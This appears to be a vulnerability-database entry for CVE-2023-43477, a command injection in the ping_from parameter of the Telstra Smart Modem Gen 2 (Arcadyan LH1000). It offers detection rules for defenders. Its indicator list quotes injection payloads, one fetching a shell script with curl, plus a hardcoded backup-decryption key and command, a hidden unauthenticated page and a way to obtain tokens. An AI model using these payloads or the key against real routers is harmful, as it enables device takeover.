cbcvebase.
CVE-2023-43477
published 2023-09-20

CVE-2023-43477: The ping_from parameter of ping_tracerte.cgi in the web UI of Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, was not properly…

PriorityP268high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
15.75%
96.5th percentile
The ping_from parameter of ping_tracerte.cgi in the web UI of Telstra Smart Modem Gen 2 (Arcadyan LH1000), firmware versions < 0.18.15r, was not properly sanitized before being used in a system call, which could allow an authenticated attacker to achieve command injection as root on the device.

Affected

2 ranges
VendorProductVersion rangeFixed in
telstraarcadyan_lh1000_firmware< 0.18.15r0.18.15r
telstrasmart_modem_gen_2< 0.18.15r0.18.15r

Detection & IOCsextracted from sources · hover to see the quote

path/ping_tracerte.cgi
commandping_from=;uname+-a
commandping_from=;curl${IFS}http://192.168.0.2:443/shell.sh${IFS}-o${IFS}/tmp/shell.sh;
path/tmp/shell.sh
path/usr/sbin/httpd
path/hninh987R47san82.htm
path/fake_upload.cgi
path/login_fw.cgi
cookieSID_63c6d632=[logged_in_cookie_val]
otherhttoken=518287608
commandopenssl enc -d -aes-256-cbc -md MD5 -salt -in LH1000V1-backup.cfg -out dec.tgz -k '2&15u69A'
other2&15u69A
path/sbin/arc_deviceready
  • Detect POST requests to /ping_tracerte.cgi where the ping_from parameter contains shell metacharacters (e.g., semicolons, ${IFS}) indicative of command injection attempts.
  • Alert on HTTP POST requests to /fake_upload.cgi from unauthenticated sources, which may indicate exploitation of the unauthenticated firmware/config upload vulnerability (CVE-2023-43478).
  • Monitor for access to /hninh987R47san82.htm, a hidden page that exposes firmware update and configuration restore functionality to unauthenticated users.
  • Detect use of ${IFS} in HTTP POST body parameters targeting LH1000 devices, a common technique to bypass space filtering in command injection payloads.
  • Monitor for unexpected telnet (port 23) activity on LH1000 devices after a reboot, which may indicate a malicious configuration backup was uploaded enabling a root telnet shell.
  • Inspect POST bodies to ping_tracerte.cgi for the util_name=pingtest pattern combined with anomalous ping_from values containing semicolons or command chaining characters.
  • ·The vulnerability requires authentication (post-auth) for CVE-2023-43477; an attacker must have valid credentials or a valid session cookie (SID_63c6d632) to exploit the ping_from command injection.
  • ·The hardcoded encryption key '2&15u69A' used for LH1000 configuration backups (AES-256-CBC, MD5) allows any attacker to decrypt, modify, and re-encrypt configuration files for malicious upload.
  • ·Uploading a malicious configuration backup with incorrect settings could permanently disable the device, even beyond recovery using the hardware factory reset.
  • ·The httoken value used in requests can be obtained by executing ArcBase._t() in a JavaScript console on the main login page, or copied from recent traffic — it is not a strong CSRF protection.
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.